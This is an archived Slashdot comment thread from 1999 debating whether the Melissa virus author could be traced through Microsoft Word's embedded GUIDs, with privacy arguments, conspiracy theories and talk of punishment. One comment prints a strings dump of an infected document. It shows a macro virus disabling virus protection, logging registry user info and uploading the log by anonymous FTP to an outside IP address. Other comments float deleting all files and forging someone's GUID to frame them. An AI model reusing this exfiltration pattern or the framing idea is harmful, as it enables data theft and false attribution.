Slashdot Mirror
Melissa Creator tracked using MS's ID numbers?
So last week there was a lot of hype about Microsoft embedding
IDs into documents that would allow tracing of authors.
This week there was hype about Melissa- yet another lame
doomsday macro virus (intentionally not posted here because
I found it stupid). But mix the 2 together, and you get
a story sent to us by stevew: the Melissa Virus can
supposedly be traced
to its creator using those annoying little ids. They don't
have exact details, but the article says that it came from
AOL.
Sorry - the e-mail address is skyroket@aol.com (without the 'c' in 'rocket').
EH
I'm not trying to invite a flame war, but I like Outlook 'cause I receive *immediate* notification when I get new mail. Sure, I could have Eudora check every 5 minutes, but it's so much nicer to just get the mail without checking for it.
Maybe IMAP is better? I've never used it....
EH
This is not the winblows 98 MSID, this is just
a normal GUID generated by the program. What is
interesting is that _every_ guid generated on
your machine can be associated to your machine.
The GUID gen program uses the mac address and/or
other machine specific numbers to create the number sequence. Doe anyone know the scheme
for the GUID?
Who's says you have to be a semi-literate programmer to use VB?
I think that this is an invasion of privacy in some sense, but nonetheless, for them to be able to track a person down like that is pretty wild.
It seems though that this people are too hard on companies for doing any kind of tracking whatsoever. Who cares if they keep track of who writes what. If you want to remain anonymous, use vi.
it doesn't matter to me.. some script-kiddie going down is a good thing.
in case you didn't realize, search and seizure is also a violation of privacy, but we most often overlook that in the name of the common-good.
What are the advantages of Outlook over Exchange client? This also gives immediate indication of incoming mail. It does not use Word as an editor, so why change to Outlook (as the upgrade to Office 97 wanted to do?)
FIRST, they invade our privacy.
Then, they write documents which can be infected with viruses.
Then, they write a mail server which can conduct the virus.
Then, they sell us this stuff, which can only run on an unstable operating system.
Perhaps, they may find some documents we've written to be "illegal" and find us out with their privacy invading document format.
Which one should we thank them for?
Proud to be (almost) Anonymous
I bet you're right. I had just been thinking the same thing. Oddly enough, in history class (school, shudder) we are learning about WWI, and how the British 'found' a telegram from Germany to Mexico proposing an alliance against America. That was one of bigger things that got America into the war-- on the side of the British!!!
Creepy, huh?
It seems my login isn't working again, so now I have to actually type "P
LafinJack
"The best defense is a good offense, and I plan to start offending right now." --J. T. Kirk
I'd doubt it, since a MAC address is 48 bits and a GUID is 128...
Oh, ActiveX can be made safe easily. You write a bytecode-Verifier (x86-Assembler is a Form of Bytecode) and demand all Interfaces (COM you know?) used to be known to it, if not - reject!
mine:~ $ ls -Fl /usr/contrib/bin/less /usr/contrib/bin/less* /usr/bin/more /usr/bin/more*
-r-xr-xr-x 1 bin bin 57608 Jun 15 1998
mine:~ $ which more
/usr/bin/more
mine:~ $ ls -Fl
-r-xr-xr-x 1 bin bin 21876 Jun 12 1998
mine:~ $
Actually less is more than double.
If I wanted to create and distribute a macro virus, and wanted to cover my tracks, the first thing I would think of is to spoof a known macro virus writer..
Anyone with a clue would have embedded someone
..
elses serial number into the virus document.
Wouldn't you have put someone elses serial number
in it
I actually used Word for the first time. Made a test document that contained (without quotes) "!This is a test!"... Then saved it. It should be 16 bytes, or 18 with CRLF. Nope. It's 7,168 bytes. I then looked in the file to see how many times my name appeared in it. *5* freakin' times! The text itself (!this is a test!) appeared 3 times. I always knew M$ was bloated as all hell, but damn! What the hell is the point in storing *MY* name in a document 5 times? Time to deltree c:\msoffice now.
No !! Every GUID CONTAINS the MAC! The last Digits.
You need only two Types "Address" and "Non-Address". The other is flavor.
I'm kind of fond of this thing; now when our users ask why we're using Groupwise and WordPerfect, we can just remind them about that big scary virus that was all over the news, which spreads because of Microsoft's incompetance. It's a pretty good way to deflect those comments like, "well, everyone else is using Word, so we should also."
The next step is to see if Groupwise will run under WINE and move everyone to a more robust OS. :)
Anonymous Coward
Now there will probably be a public outcry to KEEP the GUID so we can stop those nasty hackers and pedophiles and pornographers...
I would tend to believe the hacker was not framed, that he just overlooked the GUID. Nobody'll ever make that mistake again. But it doesn't matter, everyone will be screaming for the GUID once more...
I'm inclined to agree. While not condoning "viruses", this type of insidious behaviour is more troubling and potentionally chilling in the long run than an accute incident like "Melissa".
If the US Government wasn't so stupid about encryption, both encryption and digital signatures would be much more common than they are now.
If digital signatures were much more common than they were now, maybe software would be smarter about opening stuff that's not signed by people we know.
If software was smarter about opening stuff that's not signed by people we know, maybe we wouldn't have such major issues with macro virusses.
It's the US Government's fault.
Someone could create a similar virus an put the GUID of Bill Gates in.
Seriously, you could take the GUID of a person, you don't like and insert it in your selfmade virus.
Sounds bad to me.
It amazed me when that genius Berst (www.anchordesk.com) completely overlooked the biggest bennie to Office 2000 in his review of it. Office 2000 DOES have code signing for VBA!
You forgot to mention that various states are attempting to sue gun manufacturers.
KN
Why is thing being called the "Melissa" virus? Is that the author's name. She must be getting jollied at all the attention her creation is receiving. Kudos to the media for encouraging others to try and get their names on TV/radio/newspapers nationwide. Not.
Charges of terrorism? Against Microsoft? Good idea.
Reality check: People will write viruses. That is a fact of life. They can obfuscate the tracing to make it impossible to find the author. That is a fact of life. Ordinarily the system vendors deal with it and there's no problem. But Microsoft considers proprietary lockins through embedded executable code in documents to be far too important to their revenue stream to even care if they open up the world communication infrastructure to easy destruction.
What Microsoft is doing is criminal negligence.
Microsoft are the ones who are to blame for building an application infrastructure so devoid of even the simplest precautions.
Get to the actual problem. Throw the people in charge of office and outlook development in jail and force Microsoft to issue recalls for all versions of office affected by macro virii.
Have you been visited by Lew Giles??
Maybe M$ has. The NSA has a long history of politely asking comapnies to make their products less than as secure than they could be.
Same thing with growing certain plants in your own home even if you are terminally ill and it's for medicinal purposes. But of course, people tend to forget that money is the important thing, not lives or quality of life.
KN
PS: I'd like to take a moment to thank the distilleries, tabacco industry, and pharmaceutical companies for donating so much of their hard-earned money to the war on marijuana while I'm at it.
Hmm, I wonder if Microsoft itself didn't plant the virus in order to show how useful their "tracking" systems are and maybe sway public opinion to accept them, since they can be used for "good". Intel would benefit too, with it's processor ID. Anyone buy the consipracy theory?
Pardon me if this avenue has already been explored in an earlier thread. I haven't read all of them yet!
BTW, I don't REALLY believe this is the case, but it does make for an interesting possibility...
I think the virus writer's GUID ending up in the document is more akin to your phone number ending up on someone else's caller ID box when you make a phone call. You didn't give explicit permission for the phone company to release that information, or permission for the other party to extract it, but it is considered 'acceptable'. I don't think that a company producing software, or other any other product, for that matter, needs "just cause" to attach an ID number to the output of that product. "Just cause" is required by law to prevent the abuse of power by our government and it's agents. There is no such requirement for private businesses.
It smacks of Big Brother, but a wiretap in violation of the Fourth Amendment it isn't.
It worked on the first release.
What are the chance that MSFT/Intel created the virus to prove that these tracking mechanisms are useful/necessary?
Outlook is the Exchange client. The old exchange client has been replaced by Outlook in the exchange server distribution. MS dropped the old exchange client in Exchange 5.5 Matt Fisher http://securityportal.com
Shortly after the virus was discovered last Friday, the MS Exchange mail servers at Lucent Technologies were brought down to prevent the virus from doing harm, and they're still down now. That's what I call an effective virus.
Can you believe it, we invented Unix and now we're the victim of Microsoft crap.
Hmm... Macro Virus + AOL + alt.sex = some dumb kid.
Ok - I see it - they find out there is this kid writing these viruses - lock him up for five and fine him $350,000!
What would happen to someone if they wrote a M$ macro "virus" that went around cleaning up malicious viruses from documents? Would that person (should that person) have the same judgement placed against him/her?
M$ makes crap - that much is true. Whoever wrote this (most likely some kid) was stupid for letting the GUID persist (unless he was smart and was framing someone). But the judgement doesn't fit the crime!
What about the stupidity of people not backing up thier data on a regular basis?! Or that of computer manufacturer's not including a backup device on thier systems (that damn floppy drive doesn't cut it!)?
I can't believe the number of times I have heard of someone's system dying and asking them if they had a backup - only to hear a reply similar to "Uhh, what's that...?"...!
I read somewhere that Melissa's source code would be available on the Internet. I'm intending to study the source for non-evil purposes (yeah, I'm serious!).
Anyone got an URL?
//Jonas
We start bombing an East European nation and within days email servers are failing.
Is anyone surprised that the company who fakes trying to create Grassroots support wouldnt stoop so low as to hype a lame macro virus and then amazingly the author is uncovered and the world saved using a highly controversial identifier?
Stay tuned next week when Michealangelo III pops up and the author is tracked using the serial number on his PIII.
This is MS PR at its worst, and the world fell for it. Long Live LINUX and OPEN SOURCE!
I for one am happy for the GUID. If nothing was in place, viruses could eventually
run even more wild. A sort of watch dog that you could get caught. Like a
deterrent similar to that of the electric chairs and murder.
Shockingly a lot of computer users are screaming "Where's my privacy", "Big
bother is watching." Well stop your whining. These appear to be cries from guilty
parties of something. We innocent people could care less about your privacy and
what you do with it. Your not as important to us as you might think.
Your messing with our lives and livelihoods and then have the nerve to cry foul
when someone tries to fight back. What a pathetic loser.
I was referring to Word, not WordPerfect. I use WP when I can, which is always.
Executable documents are just plain wrong.
Not in an operating system with fine grained security permissions. Unfortunately all popular OS's lack finely-grained enough security permissions so that you run a downloaded application safely (except through running a Java applet).
Heaven knows no Unix programmer would ever write something that replicates itself via email. ;-)
"This week there was hype about Melissa- yet another lame doomsday macro virus (intentionally not posted here because I found it stupid)."
Well that's just great, I wonder what other NEWS I didn't end up hearing about because Rob Malda "found it stupid." That's a wonderful idea actually, wouldn't it be great if all of the media worked this way? "What's that you say? Some kiddy-bopper in Finland wrote some program that you think is going to destroy Microsoft? That's Stupid! I can't print that..."
Sarcasm aside, I think that it's a damn shame that Slashdot is more centered around the life and views of Rob than objective news.
"So it's agreed, then. Steve, set up the Skyroket account. Nathan, I like your idea of using MAPI instead of making the virus specifically target Outlook, but then it'd make any mail vendor look bad, not just us. Me, I'll go convince the Office 2000 team to turn macros on again by default."
Gosh, I couldn't be more convinced....
The poster was thinking of IBM's "RFT" format, used on AS/400 boxes and who knows what else. "RFT" stands for "revisable-form text".
think about it: would a kid who writes viruses have his own copy of word? no. he probably has some pirated copy that 10,000 other people use. that's gonna really narrow it down.
Right on, plus MAC addresses can be changed (i tried to post this earlier and it hasn't appeared)
Certain ethernet cards allow flashed ROMs to change the number. See the latest 2600 quarterly article on hacking cable modems for reference.
I never thought I'd see an argument for security through obscurity on /., but I guess the world is full of wonder.
The GUID is not the sw registration number. It is the MAC address of the NIC. Pay attention. And mulitple virus's have now been tracked to on AOL account.
Moron
No kidding--one job I did was for an office where people blithely clicked "OK" without ever reading what was in the dialog ("Do you want to delete all records? OK!").
It's my belief that this is one of Microsoft's dumbest actions. Instead of putting real text in the buttons (like, "SAVE", "DELETE", etc.), you just get the autoreponse of "OK". Other operating systems use this, but I guess Microsoft couldn't be bothered with it.
But, even if this is the case, I really wish there was something that
could be done against M$ for introducing the entire concept of Word
viruses to the world; if they had introduced the security needed into
the vis basic routines when they first put out Word 6, things wouldn't
be as rampent now. I
Can you say class action lawsuit? MS certainly deserves for selling such a product with such bone-headed security.
All the GUID does is help catch the criminal who created the virus (assuming the GUID is accurate and was not forged).
Criminal? I hardly think this guy released a criminal virus. I get more spam probably. I mean really, all he did was put in well written code that sends more mail out to other people. There's practically more space spent on the silly time=date code and remarks than on the actual "virus". What law does this break? It can't be worse than spam.
If anything, slap a medal on this guy for pointing out to the world how _stupid_ Microsoft is for making high end features on low end products for low end users that anybody with half a brain can exploit for "evil."
Microsoft should be glad this virus didn't do anything else.
Also, vote me in for the GUID conspiracy. I thought the same thing when I saw the first link to the tracking.
http://msdn.microsoft.com/isapi/msdnlib.idc?the
Billy boy would have several, one for every NIC
--Mephie
Let's see:
o MS takes all kinds of heat from folks who give a whit about privacy because, without asking, they implant a serial number in every document their "software" generates.
o A week or two later, a virus (or worm or -insert favorite label-) expolits a vulnerability in MS applications and infects other MS products.
o Within days, miraculously, an MS serial number is found in the virus and is used to track down the author!
Wow! How fortuitous! Microsoft, not content to invent the internet (well, *co*-invent with AG), has now saved business millions of dollars by catching this evil hacker! Thanks, Bill!
Not.
Peter
Can you blame them for making a statement like that though. Reading through these comments, I'm finding alot of "Death to Microsoft and those that use their os/apps" mentality here. This is one thing that continues to bother me with the Linux community. It's a nice OS but it's not for everyone.
I think it's a damn shame that some people feel all "news" should be simultaneously reported everywhere. There probably won't be an article about the Melissa "virus" in this month's issue of "Cat Fancier" either. Why should we all have to dwell on Microsoft-created problems like Melissa?" (Microsoft created because of the assumption they made that every copy of Word and Excel should by default be enabled to send email through the macro language).
There's been no Melissa problem at my place of work (a Multinational, not a mom-and-pop) because we don't use Exchange, Outlook, or Office 97.
Maybe a few IS people should be fired for buying Microsoft over this.
because I was one of those who sent in the Melissa virus report to Slashdot. I just thought it was important as MANY Slashdotters do use Windows, Word, Outlook, blah in their workplace because their bosses say so (although personally we all prefer Linux/FreeBSD/etc :)
At least CERT thought it was important. I think this is the second time they issued a worldwide warning in their 10 years of existence (this is something I read somewhere else, CNN I think).
Oh well... just me bitching, ranting and raving!
Bad conspiracy theories make it less likely people will believe the real truth. If they find the author of Melissa, and he's some 15-year-old script kiddie, accusations that Microsoft was behind it will look ridiculous, and taint anything else these people say. The tale of the boy who cried wolf is well worth heeding.
If there's anything I intend to take personally, it's the fact that wild conspiracy theories are FUD, and I'd like to think that /.ers would be better than merely sinking to the level of their most dishonest foes. It hurts all of us.
>First of all, some of the mailservers were put out of operation, and some sites had to disconnect mail service. That's harm.
...
Hmm, Exchange Server has been known to put itself out of operation (and other servers too) without regular reboots (an out-of-service condition all its own).
>Second, the change in machine state causing an undesirable activity is vandalism. Painting the next Mona Lisa on the side of a building would be vandalism, even if the owner was then able to sell the wall for $1M
The Exchange client software is buggy, changes the machine state and causes undesireable activity (e.g. registration sends GUID to Microsoft), undesired winmail.dats etc.
>Third, while it may impose no additional cost to the victim, sending mail from his machine was an act with economic value; the improper use is theft and/or trespass.
Once again, exchange generates a *lot* of network activity that is not explictly initiated by the user - sounds like theft of bandwidth and trespass.
>Fourth, the message sent would be likely to cause problems between the sender & recipient.
I don't know what these exact problems are, but the GUID (and other juicy info) sent to Microsoft likewise causes "problems" for the sender. The recipient is probably happy to receive free marketing information that the sender didn't wish to transmit.
>I see no way in which the virus *isn't* harmful.
I must admit that there are probably ways in which Exchange is non-harmful, I just can't think of any right now. Undesired attachments? mail protocol violations?
Sounds like a good case.
Ever look at a rtf file in a text editor. Its just a frigging markup language. They can't hide anything in it.
Here's a quarter, buy a clue.
IH8ZENOR
Yes, but the GUID goes a long way towards proving this in court. Especially if they can find the Ethernet card with with MAC address corresponding to the GUID. Of course, if I were this guy, I'd be getting rid of some hardware right now...
Except of course in cases involving any allegation of drug use, impropriety, or action alleged to be against the state. In such cases ordinary legal protections are not really in force in amrican courts. The United States is quite terroristic in these matters.
But in the remaining kinds of cases you are quite correct, illegal search and seizure are deemed objectionable.
It cannot
The files do not keep a copy of all the transit points, they only keep the last creator, not all levels of creators, its not like it has the original and the second etc.
You would only get the last creator, never the orig, andbesides the source is probly from a university machine using a pirate copy.
Get a clue! Man perhaps we do need a nuke to get rid of clueless twits
Is the computer world really been vitiated to such a degree that a 13-14 year old "coder" can write a Word macro and attract national attention?
Let me remind you all that this is a Word macro . Even the techniques being used to capture this kid are unbelivably obvious. If the "hacker" were all that compitent and/or actually intended to attract this much publicity, it would make sence for him to lisence the product using a generic fake ID and release the "virus" from an internet cafe or campus using a generic login. It appears that this script kiddie did none of those things. I think it's sad that he's turned this many heads. I almost feel bad that the FBI is going to make an example out of some poor wanna-be coder. I'll give two to one odds that the author turns out to be under twenty years old. Oh well.
Ryan Taylor
(ryan@schulzemfg.com)
---
Win95 is a virus.
Check out the following link:
http://itrain.org/itinfo/1999/it990307.html
There are four articles in this series. The
last one details Microsoft's promise to patch
Win98 and to supply a tool that removes the
GUID from Word97 documents. There's a link
to the MS web site in one of the articles in
the series... or there was. Now the web page
in the link is gone.
And the latest word is that the alleged perp
who unleashed the virus may be a patsy --
he has said he doesn't have a clue about all
of this and had nothing to do with the virus.
Also, he supposedly had some Word docs available
at his web site that would have made it easy
for someone to crack his GUID out of the docs
and use the id in the virus.
Now maybe Microsoft didn't do it... but the outcome is that Microsoft doesn't have to
protect the privacy of their customers now.
"See? We told you the GUID was a good idea."
Next step: Convince everyone that the Pentium III
chip id is a good thing, too.
Think Uncle Sam might have a vested interest in
seeing everyone id'ed online, too?
Color me suspicious...
Me again, the same anonymous coward who posted
the original article in this "scam" subthread...
Have some more links...
http://security.pharlap.com/regwiz/index.htm
This site demonstrates the insecurity that
Microsoft wants all of us to swallow.
http://www.vecdev.com/guideon.html
This site provides a free utilty to remove
or munge the GUID.
What concerns me is that with so many white
papers and other docs written in MS Word, posted
to the Web, any number of innocent people can
be framed for creating an MS Word virus.
EVERYONE should cleanse their MS Word docs before
transfering them by ftp, by e-mail, etc.
--the suspicious guy
Well, I'm convinced, this is the last straw
(this GUID b.s.). Time to dump MS products
from my systems.
I've said it for several years now... I use MS
because I have to (for consulting, etc.); I
use Linux because I choose to. I'm recommending
to all my clients that they dump MS and switch to
Linux if at all possible.
For those old Office docs, though, there's an
alternative. Cleanse the GUID from them, then
edit or create new docs on Linux with Star Office.
Feh. Fooie, Microsoft!
You're not being overly paranoid. MS
has given us plenty of reasons to distrust
it. Bill Gates, burn in hell.
If the DoJ lets MS off easy -- and the GUID
is kept around to track those "bad hackers"
-- I'll be concerned that MS cut a deal to
supply the feds with GUID tracking info as
needed.
Dear Mr. Facist.
The punishment should fit the crime. It's like when the FBI, BATF and special forces barbecued those people in Waco Texas, did they scare other cult members of gun owners straight?
No, all they did was piss people off. All they did was incite the murder of 168 people two years later.
The more they tighten their grip, the more people on the fringes will slip through their fingers. (Credit to George Lucas)
Lord Kano (Too lazy to Log in)
hmm...maybe we should also give J-Walkers LIFE. Speeders should get DEATH. Then we should go after all those 12year old 31337 scr1pt K1dz who made the 123213144 virii for Windoze/DOS/MacOS. They should get LIFE in jail and DEATH.
:)
If you ask me the FBI should be going after M$. All the virri and this 1 of 1000 Micro Virus's is all MS's fault. Funny how a MS-DOS Virus from 1984 can still mess up Windoze98. If they realy spent the money on making good software rather then making good FUD we wouldnt be having these problems. Do we see this crap on any of the Unix's or Linux? no..Do we see this crap on Apple OS's? Not nearly as much.
So now the FBI is gona track down and lock up some guy with to much time on his hands just to save MS some bucks. I'll bet he is a better programer then most of the people who code for MS.
PS: I hope you get pulled over for Speeding
I'd call it a worm. It doesn't actually destroy stuff, it just propagates...
Obviously, it would be trivial to add code to severly damage the software the macro is run on - kill "*.*" would be a start. With the rate this thing propagated, the destruction could have been massive.
I guess this is why the MS EULA has so much fine print!
Perhaps YOU overlook the violation of your personal freedom, civil liberties, and the Constitution when it becomes convenient in order to bother someone else, but most of us would rather let a criminal walk free than sentence an innocent man to prison. If we give these bastards an inch of our freedom, they take it all. If you doubt that, read the Constitution and compare its limitations on the power of our governement with our current situation. YOU tell US whether our governement can be trusted if we let them take away freedom and law in order to "catch the bad guy".
:-|
Hell, we're all still spending an extra 2 hours at the airport each trip to protect us from terrorists when it is pretty damn likely that airline crash that caused all of this dismissal of our civil liberties was in reality shot down by our own navy. Yippee.
Yup.. i agree... look AOL my be getting a bit cooler, getting netscape .. but geesh, get control of your on-line service first. You have a bunch of internet freaks that don't know anything except how to annoy people. Good thing i don't use M$ at home.
Dark_Hour
...its the MAC number on the nic which whill bite them in the ass So surely then, if the creater were to have a machine without a NIC then the GUID would be meaningless?
Nope. You also need to distinguish the object
type that the address points to. Or else, how
would you know, if you have a thingie of type
address, whether it points to another address,
or to a non-address?
ViewVBCode
c:\class.sys
VBA332.DLL
VicodinES Loves You / Class.Poppy
I Think
is a big stupid jerk!
codemodule
I have no idea whats going on but happened to open a word doc in recover text mode. being curious I scanned down to see what garbage was in the file and came accross the the above not more than 1 min later i noticed the article and then ViconeES pops up. I have no idea what the connection is or why its embedded in some of our word document.
From what I understand the diffrence between a worm and a virus is that, a virus infects a program, and a worm is a self contained program. Wouldn't a script constitute a self contained program?
Well, I really don't know how Melissa works, from the blurbs I've heard on the news, you get an email talking about an important document, you download the document and open it, when you open it, it runs the script and the script sends 5 emails with the same document to 5 email addresses on your system.
Now if it infects other documents and sends those documents then it is a virus, but I don't know for sure.
MSNBC has an article on the supposed "source" of the virus, and towards the bottom is a picture of the "original posting" to alt.sex. You can make out the e-mail address of SkyRocket believed to be the originator. Boy, I'd hate to have to check his e-mail tonight! ;-)
EH
HTML doesn't have viruses and know one cares who first wrote it.
Whenever I try to put Unix in at our company there is always a fuss thrown by middle-managers; but when something like this happens, they shrug?
Let's face it: Microsoft products are glitzy but they are not secure, not robust, and often not correct. It's time to back public protocols for business solutions and to be responsible by supporting correct and reliable standards and programs.
What if Microsoft was behind the whole thing? This way, they can justify the use of the GUID's.
:)
It was just too easy to catch up to the culprit. I don't think any self-respecting cracker would leave such obvious fingerprints.
Think about this too: This was a clever virus that used Outlook and Office to spread itself. Why didn't anyone do this before? Because only Microsoft programmers would think of such a thing!
BTW... If anyone takes this post too seriously, then they need to take more humor lessons.
...as Bill Clinton might say.
Hmm... I think it is documented somewhere.
At least it is ascii.
I use Applixware and have found that RTF is
the best way to exchange documents with
the 'dark side' of the company. Things sorta
go both ways without too much degradation.
Even pictures.
I'm trying to get them to send RTF when they
mail documents to other people so we don't get
those embarassing "your document has a virus"
emails.
-- cary
Our civilization should have learned the
hard way that diversity is good, and having
a critical infrastructure based on identical
systems is bad. The Irish potato blight comes
to mind, as does health problems in race
horses and Mr Morris's worm.
Without diversity the whole infrastructure
is 'brittle' wrt new threats. With diversity
there is strength. That in itself should be
reason enough to prevent one entity's
domination of the information technology
infrastructure, be that cisco, microsoft, intel,
or even (gasp!) Linux.
This is one of my pet peeves, and everyone needs
a pet.
-- cary
/* anyone
smart enough to engineer this type of thing would
be smart enough to be able to cover their tracks.. */
Nonsense. It's just a macro virus, not a balanced AVL tree. It doesn't take a genius to write a macro virus.
I dunno. Maybe I'm paranoid. But I was thinking, "Yanno, If I were MS and I were catching flak for this whole privacy thing, I'd consider something like this."
Their record shows they're not above dishonestey if they think it will advance their public image. They've never done anything quite so destructive in the past if you don't count inflicting Windows on us all, but I'm afraid I find the scenario plausible. I really believe that they would do this if they thought they could get away with it.
Trust no one.
/*
Doesn't it scare people here what can happen to you for programming something on a computer? */
No more than the conviction of Ted Kaczynski scared me about what could happen to me for making something in my kitchen. And like Kaczynski, it's a lot more scary knowing that malicious bastards are out there.
Virus writers and crackers need to be given some serious jail time and fines. They cost the economy a great deal of money. They've been able to get away with this crap for way too long. I hope they catch the little SOB and throw the book at him.
If you think about this, using the ID to track the writer is probably legal. After all, it's legal to use your fingerprints to convict you of a crime. IMHO this is no different. User happened to leave his dirty little fingerprints in a couple of places on the net. Open and shut book there.
HOWEVER, this is also hardly more than circumstantial evidence. I bet it would be trivial to write a perl program to go out to j.random.word.document on the web, extract the GUID, and overwrite the GUID of a word document that you've created. If I were out to get someone (Like a competing cracker, for instance) that's exactly what I would do. The Melissa virus came out well after the news of the ID had been posted.
If I used Microsoft products, I'd prove this by writing a program to do just that. Might have to borrow a 'doze box long enough to get a few word documents to play with. That's assuming a "Swap your GUID" script isn't already on rootshell for the script kiddies' downloading pleasure.
I'm sure that the law enforcement community can find some law that the Melisa author violated.
But Microsoft has written code that (1) its purpose (and effects) are not disclosed (2) is purposely malicious to users (collecting GUID's, embedding irrelevant private hidden information in documents (I'm refering here to directory trees, other file contents etc.) (3) is widely desimenated without user knowledge (except for the "trojan" part e.g. wordprocessor, browser, etc.) (4) generates network packets that the user does not know about or initiate directly.
Microsoft's motivation for these actions were profits and power. The virus writters motivation was? Microsoft has inflicted serious costs onto individuals, businesses, etc because of such software "hidden features." So even if intent is part of the statute, Microsoft had intent. It is harder to imprison a corporation than an individual, but fines etc. are easy to impose.
;-)
There are people whose lives (not livelihood) depend on their anonymity. Suppose your document regarding government officials is intercepted on it's way to Amnesty International. This whole episode should give those government officials a pretty good idea how to track the culprits down if the document was written in Word. Thank god for ASCII and PGP!
KN
Life in prision? Death? For a freaking computer virus? Yes, I agree they cause lots of problems, but I don't think you should kill the dude!
What would you get for a speeding ticket? Your right foot chopped off?
(hey, this is beginning to sound like those middle eastern counties!)
Kevin Mitnick accepted a plea bargain... and denied the Feds a show trial. He certainly wasn't going to get a fair trial, not after being held in jail for *four years* and denied reasonable access to the evidence in order to prepare a defense.
Less than a week later Melissa is introduced... and now we learn of "proof" that the author was a known virus writer. The "proof" is that the MS GUID in the virus matches that readily available in documents posted on his web site.
In other words, the "proof" is precisely as valid
as my "proof" that I wrote Linux in 1972. After all, who can argue with the timestamp on the files?!
Do I really believe this is a deliberate attempt to frame someone for political purposes? No. Do I believe that Kevin Mitnick is totally innocent and should have never spent a day in prison? No.
But I *do* believe in history's lesson that the way we treat the Kevin Mitnick's and Larry Flynt's of the world today is how *we* will be treated tomorrow. I find it deeply disturbing that Kevin Mitnick, accused of *no* violence, was held prior to trial far longer than either Timothy McVeigh or Ted Ka^H^H^H^H the unabomer. It is signficiant that the latter two individuals faced the death penalty, while Mitnick will now be out within a year. Where is the justice in a system where an individual, even if acquitted, will spend the same amount of time in prison?!
I further believe that nothing is more dangerous to freedom than a grandstanding prosecutor. The Communist witch hunts in the 50's are a classic example, and already I can hear the questions:
Are you now, or have you ever been, a hacker?
Do you now, or have you ever, associated with known hackers?
The very real differences between "hackers" and "crackers" will matter no more than the differences between active Soviet sympathisers and the "fools" who didn't believe that 1950's America was the peak of human civilization and culture.
The bottom line, today, is that any defense lawyer who uses this as a defense is an idiot. I would not convict on this evidence alone, but neither do I find it particularly likely that it is, in fact, a setup.
The bottom line, tomorrow, is that the feds need to be careful with how they handle crackers because reasonable people *are* starting to ask questions about the way such cases are treated. The worst a cracker could do is a drop in the bucket compared to the damage caused by distrust of prosecutors. (Prime examples: AG Meese's comment that "there are, by definition, no innocent suspects" or Kenneth Starr effect on the debate over renewing the independent counsel law.)
I got a Word document emailed to me the other day -- since I was on a unix box at the time, I used 'strings' to have a quick look at it. Here is part of what I found (just the juicy bits):
/c ftp.exe -n -s:c:\netldx.vxd
(Note: I'm pretty clueless as to the internal workings of Word documents, but it looks like the virus writer was kind enough to comment his/her code!)
- this is a marker!
Declare Variables
Initialize Variables
Switch the VirusProtection OFF
HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
LogFile
' Log
file -->
' Log
file -->
C:\hsf
.sys
c:\netldx.vxd
o 209.201.88.110
user anonymous
pass itsme@
cd incoming
ascii
put
quit
command.com
HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
LogFile
Make sure that some conditions are true before we continue infecting anything
Tru
Infect the NormalTemplate
ed = T
alTe
veDocu
Write a log file of this NormalTemplate infection
hh:mm:ss AMPM - $
dddd, d mmm yyyy$
ode
ime, "
Infect the ActiveDocument
empl
tiveDo
mmm y
Logfile -->3) &
But will people really blame Microsoft? When we had gas
shortages in the mid 70-s, I recall people
blaming the Arabs, the oil companies, and the government.
But few blamed the car manufacturers, who had
been pushing gas-chugging monsters for more than a decade,
or themselves, for buying those cars.
If I remember correctly, Melissa & Melissa's "Poppa" get around the so-called "macro virus protection" in Office 97 by telling Office 97 to turn it off (without informing you). I don't think you should give M$ any credit at all.
Those who would give up freedom for security will deserve and receive neither.
5-10 years and $350,000? What the f*ck is that? Maybe Microsoft should be slapped with a class action lawsuit for setting up the infrastructure that allowed this virus to spread.
This punishment does NOT fit the crime done. Basically, all this guy did was write some code (if you want to call it that). I will not deny the code was malicious, but we don't know why he did it. I could see someone trying stuff like this "just for the hell of it". Besides, if this guy hadn't done it, that security hole would have remained, and if it had been presented a year from now (presumably when even more people will be using email) it could have been MUCH worse.
Basically, they are setting the punishment based on the fact that is scared the shit out of the FBI and lots of other people, not based on the actual crime commited.
Doesn't it scare people here what can happen to you for programming something on a computer?
In the mean time, in order to get back at him, might I suggest you:
Stop contributing code.
Cancel that membership check.
Cancel that donation check.
Halt shipment of that new hardware you sent.
Stop contributing stories.
Stop making helpful suggestions.
Oh, wait, my bad, you DON'T do any of this. Ok, so that gives you... WHAT right to tell him how to run the site HE built, and HE funded, and HE works full time on?
If YOU, being God and all, feel you can do a BETTER job, then do it. Surely one with your wisdom and 377373 news posting skills can build a better slashdot than slashdot. And when you do, the masses will flock to it... right?
*If you make no effort to help, then DON'T knock a free service provided by the generosity of an (ex)student's heart!*
Jackass...
--
--
Just lurking, thanks!
Uhm... "law enforcement officials" ?
----------------- ------------ ---- --- - - - -
----------------- ------------ ---- --- - - - -
Your honor is perfectly understandishable.
What happened to privacy? Well, basically commercialism. Microsoft (or just about any company anymore) wants to get as much information as they can on users (refer to that whole banking deal a while back). They've got an OS, office program, various programming programs, all using proprietary file formats. Now considering all this is done with closed source, no specs on the file formats, etc, who's going to know that there's MAC address and whatever else they want to include in your Word document? All the meanwhile, they are crying, "Closed information is the only way to be secure!! Open source means you'll be hacked into!! Arggggggggggh!"
Didn't the original articles on this information being in documents say something like it dated back even into the Windows 3.1 era? So, they've gotten away with it for all these years. And now we're starting to see just what these sort of companies want from us.
Starcraft was sending all kinds of information from the registry to their battle.net servers if you typed an invalid password, as well. Of course they wrap it around, "We did it to help our customers, yeah, that's it, help them." And Intel really just put the ID in the P-III as a replacement for cookies, remember web page settings, sure.
So all this is going on all these years, and people just don't care. They accept the products from giant corporations, and go with it.
With all this going on, Open Source really can take the lead in security/privacy concerns. We need to shout, "Here are our guts, program code, file formats, etc. Critique them, find holes/problems." Only with open sources can people be REALLY sure none of these scrupulous programmers include this sort of information in files.
Or better yet, can two different MAC address possibly generate the same GUID?
It >may have once meant Revisable Text Format...but all documentation I've read of late calls it RICH Text Format (meaning that it can have font properties and color).
-=Mongr=-
From the way I read it, it sounded like they didn't even need the GUID to catch the guy, they had already traced Patient Zero to the alt.sex newsgroup and had his AOL address, which they could easily turned into a real name and address with the correct warrent.
...for me, at any rate. :)
I use only MacOS and Linux, have never owned a copy of Word, and to the best of my knowledge there is nothing vaguely resembling a COM object anywhere on my system, even without my taking special precautions.
